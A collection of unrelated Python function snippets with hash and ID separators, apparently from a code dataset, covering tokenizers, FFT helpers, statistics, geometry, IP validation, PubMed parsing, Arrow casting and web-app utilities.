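A usage sketch with a hypothetical URL and filename. One design note: as written, `requests.get(url)` downloads the whole body into memory before the chunked loop runs, so the chunking only controls how the file is written; passing `stream=True` would make the loop actually stream from the network.

```python
# Hypothetical URL and target filename, for illustration only.
saved = download("https://example.com/data.bin", "data.bin")
print(saved)  # "data.bin"

# Streaming variant of the same idea (sketch):
# response = requests.get(url, stream=True)
# for chunk in response.iter_content(chunk_size=chunk_size): ...
```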
0a86b8600e72e349a4e1344d2ce1ad2bb00b889d
3,652,469
def tokenize(data, tok="space", lang="en"): """Tokenize text data. There are 5 tokenizers supported: - "space": split along whitespaces - "char": split in characters - "13a": Official WMT tokenization - "zh": Chinese tokenization (See ``sacrebleu`` doc) - "moses": Moses tokenizer (you can specify the language). Uses the `sacremoses <https://github.com/alvations/sacremoses>`_ Args: data (list, str): String or list (of lists...) of strings. tok (str, optional): Tokenization. Defaults to "space". lang (str, optional): Language (only useful for the moses tokenizer). Defaults to "en". Returns: list, str: Tokenized data """ if tok == "space": def tokenizer(x): return x.split() elif tok == "char": def tokenizer(x): return list(x) elif tok == "13a": def tokenizer(x): return sacrebleu.tokenize_13a(x).split(" ") elif tok == "zh": def tokenizer(x): return sacrebleu.tokenize_zh(x).split(" ") elif tok == "moses": moses_tok = sacremoses.MosesTokenizer(lang=lang) def tokenizer(x): return moses_tok.tokenize(x) else: raise ValueError(f"Unknown tokenizer {tok}") return _tokenize(data, tokenizer)
0974edc3a4d66b90add101002fbcc1486c21e5ce
3,652,471
def ift2(x, dim=(-2, -1)): """ Process the inverse 2D fast fourier transform and swaps the axis to get correct results using ftAxis Parameters ---------- x: (ndarray) the array on which the FFT should be done dim: the axis (or a tuple of axes) over which is done the FFT (default is the last of the array) Returns ------- See Also -------- ftAxis, ftAxis_time, ift, ft2, ift2 """ assert isinstance(x, np.ndarray) if hasattr(dim, '__iter__'): for d in dim: if not isinstance(d, int): raise TypeError( 'elements in dim should be an integer specifying the array dimension over which to do the calculation') assert d <= len(x.shape) else: if not isinstance(dim, int): raise TypeError( 'elements in dim should be an integer specifying the array dimension over which to do the calculation') assert dim <= len(x.shape) out = np.fft.fftshift(np.fft.ifft2(np.fft.fftshift(x, axes=dim)), axes=dim) return out
50377bb81fa17c152f8b8053cdae1502dbc791ad
3,652,472
def chi2_test_independence(prediction_files: list, confidence_level: float): """Given a list of prediction files and a required confidence level, return whether the sentiment probability is independent on which prediction file it comes from. Returns True if the sentiment probability is independent of source.""" df = generate_sentiment_counts_multiple_files(prediction_files) observed = df[:-1].drop(columns='row_sum') expected = np.outer(df['row_sum'][:-1], df.loc['col_sum'][:-1]) / df.loc['col_sum']['row_sum'] expected = pd.DataFrame(expected) expected.columns = df.columns[:-1] expected.index = df.index[:-1] chi2_stats = ((observed - expected)**2 / expected).sum().sum() degs_of_freedom = len(observed) * len(observed.iloc[0]) critical_value = chi2.ppf(q=confidence_level, df=degs_of_freedom) p_value = 1 - chi2.cdf(x=chi2_stats, df=degs_of_freedom) LOGGER.info( f"chi2_stats = {chi2_stats}, critical_value = {critical_value}, p_value = {p_value:.10f}" ) return p_value > (1 - confidence_level)
870a91afa202b19398c620756492bd5297c4eb69
3,652,473
import json async def insert(cls:"PhaazeDatabase", WebRequest:Request, DBReq:DBRequest) -> Response: """ Used to insert a new entry into a existing container """ # prepare request for a valid insert try: DBInsertRequest:InsertRequest = InsertRequest(DBReq) return await performInsert(cls, DBInsertRequest) except (MissingIntoField, InvalidContent, ContainerNotFound, ContainerBroken, SysLoadError, SysStoreError) as e: res = dict( code = e.code, status = e.status, msg = e.msg() ) return cls.response(status=e.code, body=json.dumps(res)) except Exception as ex: return await cls.criticalError(ex)
20772f847137422a1da227da38946c9b1a01106a
3,652,476
def eulerAngleXYZ(t123, unit=np.pi/180., dtype=np.float32): """ :: In [14]: eulerAngleXYZ([45,0,0]) Out[14]: array([[ 1. , 0. , 0. , 0. ], [-0. , 0.7071, 0.7071, 0. ], [ 0. , -0.7071, 0.7071, 0. ], [ 0. , 0. , 0. , 1. ]], dtype=float32) In [15]: eulerAngleXYZ([0,45,0]) Out[15]: array([[ 0.7071, 0. , -0.7071, 0. ], [-0. , 1. , 0. , 0. ], [ 0.7071, -0. , 0.7071, 0. ], [ 0. , 0. , 0. , 1. ]], dtype=float32) In [16]: eulerAngleXYZ([0,0,45]) Out[16]: array([[ 0.7071, 0.7071, 0. , 0. ], [-0.7071, 0.7071, 0. , 0. ], [ 0. , -0. , 1. , 0. ], [ 0. , 0. , 0. , 1. ]], dtype=float32) In [11]: extractEulerAnglesXYZ(eulerAngleXYZ([45,0,0])) Out[11]: array([ 45., 0., 0.], dtype=float32) In [12]: extractEulerAnglesXYZ(eulerAngleXYZ([0,45,0])) Out[12]: array([ 0., 45., -0.], dtype=float32) In [13]: extractEulerAnglesXYZ(eulerAngleXYZ([0,0,45])) Out[13]: array([ 0., 0., 45.], dtype=float32) https://github.com/g-truc/glm/blob/master/glm/gtx/euler_angles.inl :: template<typename T> GLM_FUNC_QUALIFIER mat<4, 4, T, defaultp> eulerAngleXYZ ( T const & t1, T const & t2, T const & t3 ) { T c1 = glm::cos(-t1); T c2 = glm::cos(-t2); T c3 = glm::cos(-t3); T s1 = glm::sin(-t1); T s2 = glm::sin(-t2); T s3 = glm::sin(-t3); mat<4, 4, T, defaultp> Result; Result[0][0] = c2 * c3; Result[0][1] =-c1 * s3 + s1 * s2 * c3; Result[0][2] = s1 * s3 + c1 * s2 * c3; Result[0][3] = static_cast<T>(0); Result[1][0] = c2 * s3; Result[1][1] = c1 * c3 + s1 * s2 * s3; Result[1][2] =-s1 * c3 + c1 * s2 * s3; Result[1][3] = static_cast<T>(0); Result[2][0] =-s2; Result[2][1] = s1 * c2; Result[2][2] = c1 * c2; Result[2][3] = static_cast<T>(0); Result[3][0] = static_cast<T>(0); Result[3][1] = static_cast<T>(0); Result[3][2] = static_cast<T>(0); Result[3][3] = static_cast<T>(1); return Result; } """ a = np.asarray(t123, dtype=dtype) a *= unit t1 = a[0] t2 = a[1] t3 = a[2] c1 = np.cos(-t1); c2 = np.cos(-t2); c3 = np.cos(-t3); s1 = np.sin(-t1); s2 = np.sin(-t2); s3 = np.sin(-t3); Result = np.eye(4, dtype=dtype); Result[0][0] = c2 * c3; Result[0][1] =-c1 * s3 + s1 * s2 * c3; Result[0][2] = s1 * s3 + c1 * s2 * c3; Result[0][3] = 0; Result[1][0] = c2 * s3; Result[1][1] = c1 * c3 + s1 * s2 * s3; Result[1][2] =-s1 * c3 + c1 * s2 * s3; Result[1][3] = 0; Result[2][0] =-s2; Result[2][1] = s1 * c2; Result[2][2] = c1 * c2; Result[2][3] = 0; Result[3][0] = 0; Result[3][1] = 0; Result[3][2] = 0; Result[3][3] = 1; return Result;
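Since the function only depends on NumPy, the docstring examples can be reproduced directly; a 45 degree rotation about a single axis gives the expected cos/sin entries.

```python
import numpy as np
np.set_printoptions(precision=4, suppress=True)

R = eulerAngleXYZ([0, 0, 45])
print(R)
# [[ 0.7071  0.7071  0.      0.    ]
#  [-0.7071  0.7071  0.      0.    ]
#  [ 0.     -0.      1.      0.    ]
#  [ 0.      0.      0.      1.    ]]
```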
a0e6f0b58c1510aa27cb5064ddebd40b3688de37
3,652,477
def is_on_cooldown(data): """ Checks to see if user is on cooldown. Based on Castorr91's Gamble""" # check if command is on cooldown cooldown = Parent.IsOnCooldown(ScriptName, CGSettings.Command) user_cool_down = Parent.IsOnUserCooldown(ScriptName, CGSettings.Command, data.User) caster = Parent.HasPermission(data.User, "Caster", "") if (cooldown or user_cool_down) and caster is False and not CGSettings.CasterCD: if CGSettings.UseCD: cooldownDuration = Parent.GetCooldownDuration(ScriptName, CGSettings.Command) userCDD = Parent.GetUserCooldownDuration(ScriptName, CGSettings.Command, data.User) if cooldownDuration > userCDD: m_CooldownRemaining = cooldownDuration message = CGSettings.OnCoolDown.format(data.UserName, m_CooldownRemaining) SendResp(data, CGSettings.Usage, message) else: m_CooldownRemaining = userCDD message = CGSettings.OnUserCoolDown.format(data.UserName, m_CooldownRemaining) SendResp(data, CGSettings.Usage, message) return True elif (cooldown or user_cool_down) and CGSettings.CasterCD: if CGSettings.UseCD: cooldownDuration = Parent.GetCooldownDuration(ScriptName, CGSettings.Command) userCDD = Parent.GetUserCooldownDuration(ScriptName, CGSettings.Command, data.User) if cooldownDuration > userCDD: m_CooldownRemaining = cooldownDuration message = CGSettings.OnCoolDown.format(data.UserName, m_CooldownRemaining) SendResp(data, CGSettings.Usage, message) else: m_CooldownRemaining = userCDD message = CGSettings.OnUserCoolDown.format(data.UserName, m_CooldownRemaining) SendResp(data, CGSettings.Usage, message) return True return False
b15180c7e890298cc1949ddfb199b42156ee66d9
3,652,478
def human_readable_size(num): """ To show size as 100K, 100M, 10G instead of showing in bytes. """ for s in reversed(SYMBOLS): power = SYMBOLS.index(s)+1 if num >= 1024**power: value = float(num) / (1024**power) return '%.1f%s' % (value, s) # if size less than 1024 or human readable not required return '%s' % num
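A usage sketch under the assumption (not part of the snippet) that `SYMBOLS` is an ordered sequence of unit suffixes such as ('K', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y'):

```python
SYMBOLS = ('K', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y')  # assumed definition

print(human_readable_size(512))             # '512'   -- below 1024, returned unchanged
print(human_readable_size(10 * 1024 ** 3))  # '10.0G'
```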
3c4ad148bc717b7058e90b3abf5efd67f6d92651
3,652,479
def sum_2_level_dict(two_level_dict): """Sum all entries in a two level dict Parameters ---------- two_level_dict : dict Nested dict Returns ------- tot_sum : float Number of all entries in nested dict """ '''tot_sum = 0 for i in two_level_dict: for j in two_level_dict[i]: tot_sum += two_level_dict[i][j] ''' tot_sum = 0 for _, j in two_level_dict.items(): tot_sum += sum(j.values()) return tot_sum
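A quick check with a small nested dict, assuming the function is in scope:

```python
counts = {'a': {'x': 1, 'y': 2}, 'b': {'z': 3}}
print(sum_2_level_dict(counts))  # 6
```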
6b5be015fb84fa20006c11e9a3e0f094a6761e74
3,652,480
def q_values_from_q_func(q_func, num_grid_cells, state_bounds, action_n): """Computes q value tensor from a q value function Args: q_func (funct): function from state to q value num_grid_cells (int): number of grid_cells for resulting q value tensor state_bounds (list of tuples): state bounds for resulting q value tensor action_n (int): number of actions in action space Returns: np.ndarray: q value tensor """ q_values = np.zeros(num_grid_cells + (action_n,)) it = np.nditer(q_values, flags=['multi_index']) while not it.finished: qs = q_func( index_to_state( num_grid_cells, state_bounds=state_bounds, discrete=it.multi_index[:-1] ) ) q_values[it.multi_index] = qs[0] it.iternext() return q_values
2378f2021e16678b75622a23c9e57ba6b2f6d1d7
3,652,482
import re def check_ip(ip): """ Check whether the IP is valid or not. Args: IP (str): IP to check Raises: None Returns: bool: True if valid, else False """ ip = ip.strip() if re.match(r'^(?:(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])' '(\.(?!$)|$)){4}$', ip): return True else: return False
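The regular expression accepts four dot-separated octets in the range 0-255, and the input is stripped first, so for example:

```python
print(check_ip("192.168.1.1"))  # True
print(check_ip(" 10.0.0.1 "))   # True  -- surrounding whitespace is stripped
print(check_ip("256.1.1.1"))    # False -- octet out of range
print(check_ip("1.2.3"))        # False -- only three octets
```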
2ff9a9262e46546fcb8854edee4b3b18ae1e2cc4
3,652,484
from typing import Iterator from typing import Optional def _stream_lines(blob: bytes) -> Iterator[bytes]: """ Split bytes into lines (newline (\\n) character) on demand. >>> iter = _stream_lines(b"foo\\nbar\\n") >>> next(iter) b'foo' >>> next(iter) b'bar' >>> next(iter) Traceback (most recent call last): ... StopIteration >>> iter = _stream_lines(b"\\x00") >>> next(iter) b'\\x00' :param blob: the bytes to split. :return: a generated list of lines. """ start = 0 def _index(needle: bytes) -> Optional[int]: try: return blob.index(needle, start) except ValueError: return None line_index = _index(b"\n") while line_index is not None: yield blob[start:line_index] start = line_index + 1 line_index = _index(b"\n") # Deal with blobs that do not end in a newline. if start < len(blob): yield blob[start:]
8a166af1f765ca9eb70728d4c4bb21c00d7ddbf8
3,652,485
from typing import Dict async def fetch_all_organizations(session: ClientSession) -> Dict: """Fetch all organizations from organization-catalog.""" url = f"{Config.org_cat_uri()}/organizations" org_list = await fetch_json_data(url, None, session) return {org["organizationId"]: org for org in org_list} if org_list else dict()
bf033ed85671214d9282acba3361fbdc1e6d4f6e
3,652,486
from typing import Optional import tqdm def create_splits_random(df: pd.DataFrame, val_frac: float, test_frac: float = 0., test_split: Optional[set[tuple[str, str]]] = None, ) -> dict[str, list[tuple[str, str]]]: """ Args: df: pd.DataFrame, contains columns ['dataset', 'location', 'label'] each row is a single image assumes each image is assigned exactly 1 label val_frac: float, desired fraction of dataset to use for val set test_frac: float, desired fraction of dataset to use for test set, must be 0 if test_split is given test_split: optional set of (dataset, location) tuples to use as test split Returns: dict, keys are ['train', 'val', 'test'], values are lists of locs, where each loc is a tuple (dataset, location) """ if test_split is not None: assert test_frac == 0 train_frac = 1. - val_frac - test_frac targets = {'train': train_frac, 'val': val_frac, 'test': test_frac} # merge dataset and location into a single string '<dataset>/<location>' df['dataset_location'] = df['dataset'] + '/' + df['location'] # create DataFrame of counts. rows = locations, columns = labels loc_label_counts = (df.groupby(['label', 'dataset_location']).size() .unstack('label', fill_value=0)) num_locs = len(loc_label_counts) # label_count: label => number of examples # loc_count: label => number of locs containing that label label_count = loc_label_counts.sum() loc_count = (loc_label_counts > 0).sum() best_score = np.inf # lower is better best_splits = None for _ in tqdm(range(10_000)): # generate a new split num_train = int(num_locs * (train_frac + np.random.uniform(-.03, .03))) if test_frac > 0: num_val = int(num_locs * (val_frac + np.random.uniform(-.03, .03))) else: num_val = num_locs - num_train permuted_locs = loc_label_counts.index[np.random.permutation(num_locs)] split_to_locs = {'train': permuted_locs[:num_train], 'val': permuted_locs[num_train:num_train + num_val]} if test_frac > 0: split_to_locs['test'] = permuted_locs[num_train + num_val:] # score the split score = 0. for split, locs in split_to_locs.items(): split_df = loc_label_counts.loc[locs] target = targets[split] # SSE for # of images per label (with 2x weight) crop_frac = split_df.sum() / label_count score += 2 * ((crop_frac - target) ** 2).sum() # SSE for # of locs per label loc_frac = (split_df > 0).sum() / loc_count score += ((loc_frac - target) ** 2).sum() if score < best_score: tqdm.write(f'New lowest score: {score}') best_score = score best_splits = split_to_locs assert best_splits is not None split_to_locs = { s: sorted(locs.map(lambda x: tuple(x.split('/', maxsplit=1)))) for s, locs in best_splits.items() } if test_split is not None: split_to_locs['test'] = test_split return split_to_locs
b8410d8672d11c8133b7d6d8dcdead46e668b3aa
3,652,487
def ha_close(close,high,low,open, n=2, fillna=False): """Heikin-Ashi Close The Heikin-Ashi close is the average of the open, high, low and close prices and is used to build smoothed candlestick charts. Args: close: name of the dataset 'Close' column. high: name of the dataset 'High' column. low: name of the dataset 'Low' column. open: name of the dataset 'Open' column. n(int): n period. fillna(bool): if True, fill nan values. Returns: pandas.Series: New feature generated. """ indicator = Heikin_Ashi(close=df[close],high=df[high],low=df[low],open=df[open],n=n,fillna = fillna) return indicator.ha_close()
655ce9be20f56a22cbe32ed0eaf7615d2b891577
3,652,488
def PLUGIN_ENTRY(): """ Required plugin entry point for IDAPython Plugins. """ return funcref_t()
5c669321d8fc890b8b352e4041dc75773d191664
3,652,489
def chao1_var_no_doubletons(singles, chao1): """Calculates chao1 variance in absence of doubletons. From EstimateS manual, equation 7. chao1 is the estimate of the mean of Chao1 from the same dataset. """ s = float(singles) return s*(s-1)/2 + s*(2*s-1)**2/4 - s**4/(4*chao1)
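A worked instance of the formula, assuming the function is in scope: with 5 singletons and a Chao1 estimate of 50, the variance is 5*4/2 + 5*9**2/4 - 5**4/(4*50) = 10 + 101.25 - 3.125 = 108.125.

```python
print(chao1_var_no_doubletons(5, 50))  # 108.125
```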
6b93743a35c70c9ed5b9f3fc9bece1e9363c5802
3,652,490
def inBarrel(chain, index): """ Establish if the outer hit of a muon is in the barrel region. """ if abs(chain.muon_outerPositionz[index]) < 108: return True return False
9cbc5dad868d6e0ca221524ef8fc5ed5501adaa4
3,652,491
from typing import Union from typing import Callable from typing import Optional from typing import Any def text(message: Text, default: Text = "", validate: Union[Validator, Callable[[Text], bool], None] = None, # noqa qmark: Text = DEFAULT_QUESTION_PREFIX, style: Optional[Style] = None, path_autocomplete=False, exec_autocomplete=False, custom_autocomplete=None, ** kwargs: Any) -> Question: """Prompt the user to enter a free text message. This question type can be used to prompt the user for some text input. Args: message: Question text default: Default value will be returned if the user just hits enter. validate: Require the entered value to pass a validation. The value can not be submited until the validator accepts it (e.g. to check minimum password length). This can either be a function accepting the input and returning a boolean, or an class reference to a subclass of the prompt toolkit Validator class. qmark: Question prefix displayed in front of the question. By default this is a `?` style: A custom color and style for the question parts. You can configure colors as well as font types for different elements. Returns: Question: Question instance, ready to be prompted (using `.ask()`). """ merged_style = merge_styles([DEFAULT_STYLE, style]) validator = build_validator(validate) def get_prompt_tokens(): return [("class:qmark", qmark), ("class:question", ' {} '.format(message))] promptArgs = dict({ 'style': merged_style, 'validator': validator, 'complete_style': CompleteStyle.READLINE_LIKE, }) if path_autocomplete: promptArgs['completer'] = PathCompleter( expanduser=True, delimiters=' \t\n;,') elif exec_autocomplete: promptArgs['completer'] = ExecutableCompleter(delimiters=' \t\n;,') elif custom_autocomplete is not None and len(custom_autocomplete): promptArgs['completer'] = WordCompleter( custom_autocomplete, ignore_case=True, sentence=True) p = PromptSession(get_prompt_tokens, **promptArgs, **kwargs) p.default_buffer.reset(Document(default)) return Question(p.app)
74a79a0ce10503cf10841e8370de870c7e42f8e9
3,652,493
def nav_bar(context): """ Define an active tab for the navigation bar """ home_active = '' about_active = '' detail_active = '' list_active = '' logout_active = '' signup_active = '' login_active = '' friends_active = '' snippets_active = '' request = context['request'] url_name = resolve(request.path_info).url_name if url_name == 'home': home_active = 'active' elif url_name == 'about': about_active = 'active' elif url_name == 'detail': detail_active = 'active' elif url_name == 'list': list_active = 'active' elif url_name == 'friends': friends_active = 'active' elif url_name == 'account_logout': logout_active = 'active' elif url_name == 'account_signup': signup_active = 'active' elif url_name == 'account_login': login_active = 'active' elif url_name == 'snippets' or url_name == 'snippet': snippets_active = 'active' return { 'request': request, 'home_active': home_active, 'about_active': about_active, 'detail_active': detail_active, 'list_active': list_active, 'friends_active': friends_active, 'logout_active': logout_active, 'signup_active': signup_active, 'login_active': login_active, 'snippets_active': snippets_active, }
77b5a8bb367228cc31a0f2454e494d97a5e2b411
3,652,494
def setup_models(basedir, name, lc=True): """ Setup model container for simulation Parameters ---------- basedir : string Base directory name : string Name of source component Returns ------- models : `~gammalib.GModels()` Model container """ # Initialise model container models = gammalib.GModels() # Extract binary component binaries = gammalib.GModels(basedir+'/1dc/models/model_galactic_binaries.xml') binary = binaries[name] # Optionally remove lightcurve if not lc: binary.temporal(gammalib.GModelTemporalConst()) # Append binary to model container models.append(binary) # Append background model to container models.extend(gammalib.GModels(basedir+'/1dc/models/model_bkg.xml')) # Return model container return models
8b8db045d5c7b669f579a8f3b74abe204c82c285
3,652,495
def create_csm(image): """ Given an image file create a Community Sensor Model. Parameters ---------- image : str The image filename to create a CSM for Returns ------- model : object A CSM sensor model (or None if no associated model is available.) """ isd = csmapi.Isd(image) plugins = csmapi.Plugin.getList() for plugin in plugins: num_models = plugin.getNumModels() for model_index in range(num_models): model_name = plugin.getModelName(model_index) if plugin.canModelBeConstructedFromISD(isd, model_name): return plugin.constructModelFromISD(isd, model_name)
681c3b5886346e793b26d2e7c801b924ca82b546
3,652,496
def walk(obj, path='', skiphidden=True): """Returns a recursive iterator over all Nodes starting from findnode(obj, path). If skiphidden is True (the default) then structure branches starting with an underscore will be ignored. """ node = findnode(obj, path) return walknode(node, skiphidden)
efd3e10329d7e8832fa33c9425974ea2cd80938c
3,652,497
def to_string(class_name): """ Magic method that is used by the Metaclass created for Itop object. """ string = "%s : { " % type(class_name) for attribute, value in class_name.__dict__.iteritems(): string += "%s : %s, " % (attribute, value) string += "}" return string
a7e155c92c4e62c1f070a474905a7e0c654f45ff
3,652,499
def molefraction_2_pptv(n): """Convert mixing ratio units from mole fraction to parts per thousand by volume (pptv) INPUTS n: mole fraction (moles per mole air) OUTPUTS q: mixing ratio in parts per thousand by volume (pptv) """ # - start with COS mixing ratio n as mole fraction: # (n mol COS) / (mol air) # convert to mixing ratio as volumetric fraction # = (n * 6.023 * 10^23 molecules COS) / (6.023 * 10^23 molecules air) # = (q molecules COS) / (1000 molecules air) # q is mixing ratio in pptv, n is mole fraction # solve for q --> 1000n = q # therefore pptv = 1000 * mole fraction q = 1e3 * n return(q)
a6a26267f45fb70c346e86421c427bd155bfa65a
3,652,501
import warnings def is_valid_y(y, warning=False, throw=False, name=None): """ """ y = np.asarray(y, order='c') valid = True try: if len(y.shape) != 1: if name: raise ValueError(('Condensed distance matrix \'%s\' must ' 'have shape=1 (i.e. be one-dimensional).') % name) else: raise ValueError('Condensed distance matrix must have shape=1 ' '(i.e. be one-dimensional).') n = y.shape[0] d = int(np.ceil(np.sqrt(n * 2))) if (d * (d - 1) / 2) != n: if name: raise ValueError(('Length n of condensed distance matrix ' '\'%s\' must be a binomial coefficient, i.e.' 'there must be a k such that ' '(k \\choose 2)=n)!') % name) else: raise ValueError('Length n of condensed distance matrix must ' 'be a binomial coefficient, i.e. there must ' 'be a k such that (k \\choose 2)=n)!') except Exception as e: if throw: raise if warning: warnings.warn(str(e)) valid = False return valid
6c3f56c8b931b325d521805902b526054f21e22d
3,652,502
import json import yaml def yaml_parse(yamlstr): """Parse a yaml string""" try: # PyYAML doesn't support json as well as it should, so if the input # is actually just json it is better to parse it with the standard # json parser. return json.loads(yamlstr) except ValueError: yaml.SafeLoader.add_multi_constructor( "!", intrinsics_multi_constructor) return yaml.safe_load(yamlstr)
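The JSON fast path means plain JSON strings never touch the YAML loader; only the fallback needs the module's `intrinsics_multi_constructor` (not shown in the snippet), so a standalone call with JSON input is enough to illustrate the behaviour.

```python
print(yaml_parse('{"Key": "Value"}'))  # {'Key': 'Value'} -- handled by json.loads
# yaml_parse("Key: Value")             # YAML path; requires intrinsics_multi_constructor
```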
8586e1e39ae9f0933b6552531d72cb3a6516f615
3,652,503
import collections def csl_item_from_pubmed_article(article): """ article is a PubmedArticle xml element tree https://github.com/citation-style-language/schema/blob/master/csl-data.json """ csl_item = collections.OrderedDict() if not article.find("MedlineCitation/Article"): raise NotImplementedError("Unsupported PubMed record: no <Article> element") title = article.findtext("MedlineCitation/Article/ArticleTitle") if title: csl_item["title"] = title volume = article.findtext("MedlineCitation/Article/Journal/JournalIssue/Volume") if volume: csl_item["volume"] = volume issue = article.findtext("MedlineCitation/Article/Journal/JournalIssue/Issue") if issue: csl_item["issue"] = issue page = article.findtext("MedlineCitation/Article/Pagination/MedlinePgn") if page: csl_item["page"] = page journal = article.findtext("MedlineCitation/Article/Journal/Title") if journal: csl_item["container-title"] = journal journal_short = article.findtext("MedlineCitation/Article/Journal/ISOAbbreviation") if journal_short: csl_item["container-title-short"] = journal_short issn = article.findtext("MedlineCitation/Article/Journal/ISSN") if issn: csl_item["ISSN"] = issn date_parts = extract_publication_date_parts(article) if date_parts: csl_item["issued"] = {"date-parts": [date_parts]} authors_csl = list() authors = article.findall("MedlineCitation/Article/AuthorList/Author") for author in authors: author_csl = collections.OrderedDict() given = author.findtext("ForeName") if given: author_csl["given"] = given family = author.findtext("LastName") if family: author_csl["family"] = family authors_csl.append(author_csl) if authors_csl: csl_item["author"] = authors_csl for id_type, key in ("pubmed", "PMID"), ("pmc", "PMCID"), ("doi", "DOI"): xpath = f"PubmedData/ArticleIdList/ArticleId[@IdType='{id_type}']" value = article.findtext(xpath) if value: csl_item[key] = value.lower() if key == "DOI" else value abstract = article.findtext("MedlineCitation/Article/Abstract/AbstractText") if abstract: csl_item["abstract"] = abstract csl_item["URL"] = f"https://www.ncbi.nlm.nih.gov/pubmed/{csl_item['PMID']}" csl_item["type"] = "article-journal" return csl_item
889bb8bbbafd85607936db7caeb33140c4e356fb
3,652,504
def unphase_uvw(ra, dec, uvw):
    """
    Calculate unphased uvws/positions from phased ones in an icrs or gcrs frame.

    This code expects phased uvws or positions in the same frame that ra/dec
    are in (e.g. icrs or gcrs) and returns unphased ones in the same frame.

    Parameters
    ----------
    ra : float
        Right ascension of phase center.
    dec : float
        Declination of phase center.
    uvw : ndarray of float
        Phased uvws or positions relative to the array center,
        shape (Nlocs, 3).

    Returns
    -------
    unphased_uvws : ndarray of float
        Unphased uvws or positions relative to the array center,
        shape (Nlocs, 3).
    """
    if uvw.ndim == 1:
        uvw = uvw[np.newaxis, :]

    return _utils._unphase_uvw(
        np.float64(ra),
        np.float64(dec),
        np.ascontiguousarray(uvw, dtype=np.float64),
    )
a6e3d1371ed612bd1ece08fc6fabd4ee77241603
3,652,506
import uuid


def sender_msg_to_array(msg):
    """
    Parse a list argument as returned by L{array_to_msg} function of this
    module, and returns the numpy array contained in the message body.

    @param msg: a list as returned by L{array_to_msg} function
    @rtype: numpy.ndarray
    @return: The numpy array contained in the message
    """
    [_dtype, _shape, _bin_msg] = msg_to_array(msg[2:])
    _uuid = uuid.UUID(bytes=msg[0])
    _data_name = msg[1].decode()
    return (_uuid, _data_name, _dtype, _shape, _bin_msg)
c959a535a4f47c86f9520167fa59dc8eecc70071
3,652,507
def find_shortest_path(node):
    """Finds shortest path from node to its neighbors"""
    next_node, next_min_cost = node.get_min_cost_neighbor()
    if str(next_node) != str(node):
        return find_shortest_path(next_node)
    else:
        return node
4fa3979ff665b5cf8df423ff9b3fbaa880d62a73
3,652,508
from .features import Sequence, get_nested_type


def cast_array_to_feature(array: pa.Array, feature: "FeatureType", allow_number_to_str=True):
    """Cast an array to the arrow type that corresponds to the requested feature type.
    For custom features like Audio or Image, it takes into account the "cast_storage" methods
    they defined to enable casting from other arrow types.

    Args:
        array (pa.Array): the PyArrow array to cast
        feature (FeatureType): the target feature type
        allow_number_to_str (bool, default ``True``): Whether to allow casting numbers to strings.
            Defaults to True.

    Raises:
        pa.ArrowInvalidError: if the arrow data casting fails
        TypeError: if the target type is not supported, e.g.
            - if a field is missing
            - if casting from numbers to strings and allow_number_to_str is False

    Returns:
        pa.Array: the casted array
    """
    _c = partial(cast_array_to_feature, allow_number_to_str=allow_number_to_str)
    if isinstance(array, pa.ExtensionArray):
        array = array.storage
    if hasattr(feature, "cast_storage"):
        return feature.cast_storage(array)
    elif pa.types.is_struct(array.type):
        # feature must be a dict or Sequence(subfeatures_dict)
        if isinstance(feature, Sequence) and isinstance(feature.feature, dict):
            feature = {
                name: Sequence(subfeature, length=feature.length) for name, subfeature in feature.feature.items()
            }
        if isinstance(feature, dict) and set(field.name for field in array.type) == set(feature):
            arrays = [_c(array.field(name), subfeature) for name, subfeature in feature.items()]
            return pa.StructArray.from_arrays(arrays, names=list(feature), mask=array.is_null())
    elif pa.types.is_list(array.type):
        # feature must be either [subfeature] or Sequence(subfeature)
        if isinstance(feature, list):
            return pa.ListArray.from_arrays(array.offsets, _c(array.values, feature[0]))
        elif isinstance(feature, Sequence):
            if feature.length > -1:
                if feature.length * len(array) == len(array.values):
                    return pa.FixedSizeListArray.from_arrays(_c(array.values, feature.feature), feature.length)
            else:
                return pa.ListArray.from_arrays(array.offsets, _c(array.values, feature.feature))
    elif pa.types.is_fixed_size_list(array.type):
        # feature must be either [subfeature] or Sequence(subfeature)
        if isinstance(feature, list):
            return pa.ListArray.from_arrays(array.offsets, _c(array.values, feature[0]))
        elif isinstance(feature, Sequence):
            if feature.length > -1:
                if feature.length * len(array) == len(array.values):
                    return pa.FixedSizeListArray.from_arrays(_c(array.values, feature.feature), feature.length)
            else:
                offsets_arr = pa.array(range(len(array) + 1), pa.int32())
                return pa.ListArray.from_arrays(offsets_arr, _c(array.values, feature.feature))
    if pa.types.is_null(array.type):
        return array_cast(array, get_nested_type(feature), allow_number_to_str=allow_number_to_str)
    elif not isinstance(feature, (Sequence, dict, list, tuple)):
        return array_cast(array, feature(), allow_number_to_str=allow_number_to_str)
    raise TypeError(f"Couldn't cast array of type\n{array.type}\nto\n{feature}")
28c3275445a79e869b8dfe5ec49522ff10ca6842
3,652,509
def check_key_match(config_name):
    """
    Check key matches

    @param config_name: Name of WG interface
    @type config_name: str
    @return: Return dictionary with status
    """
    data = request.get_json()
    private_key = data['private_key']
    public_key = data['public_key']
    return jsonify(f_check_key_match(private_key, public_key, config_name))
00a3e78e403a54b16558e21e2c6d095560f272d0
3,652,510
def delete_user_group(request, group_id, *args, **kwargs):
    """This one is not really deleting the group object, rather setting the active
    status to False (delete) which can be later restored (undelete)."""
    try:
        hydroshare.set_group_active_status(request.user, group_id, False)
        messages.success(request, "Group delete was successful.")
    except PermissionDenied:
        messages.error(request, "Group delete errors: You don't have permission to delete"
                                " this group.")

    return HttpResponseRedirect(request.META['HTTP_REFERER'])
acad59484befdc5448031343aad47989e9c67d64
3,652,511
from typing import List


def _generate_room_square(dungen: DungeonGenerator, room_data: RoomConceptData) -> RoomConcept:
    """
    Generate a square-shaped room.
    """
    map_width = dungen.map_data.width
    map_height = dungen.map_data.height

    # ensure not bigger than the map
    room_width = min(dungen.rng.randint(room_data.min_width, room_data.max_width), map_width)
    room_height = min(dungen.rng.randint(room_data.min_height, room_data.max_height), map_height)

    # populate area with floor categories
    tile_categories: List[List[TileCategoryType]] = []
    for x in range(room_width):
        tile_categories.append([])
        for y in range(room_height):
            tile_categories[x].append(TileCategory.FLOOR)

    # convert to room
    room = RoomConcept(tile_categories=tile_categories, design="square", key=room_data.key)

    return room
d147f64aed8491ce9b4714f61b64f971683d913e
3,652,512
def str_is_float(value):
    """Test if a string can be parsed into a float.

    :returns: True or False
    """
    try:
        _ = float(value)
        return True
    except ValueError:
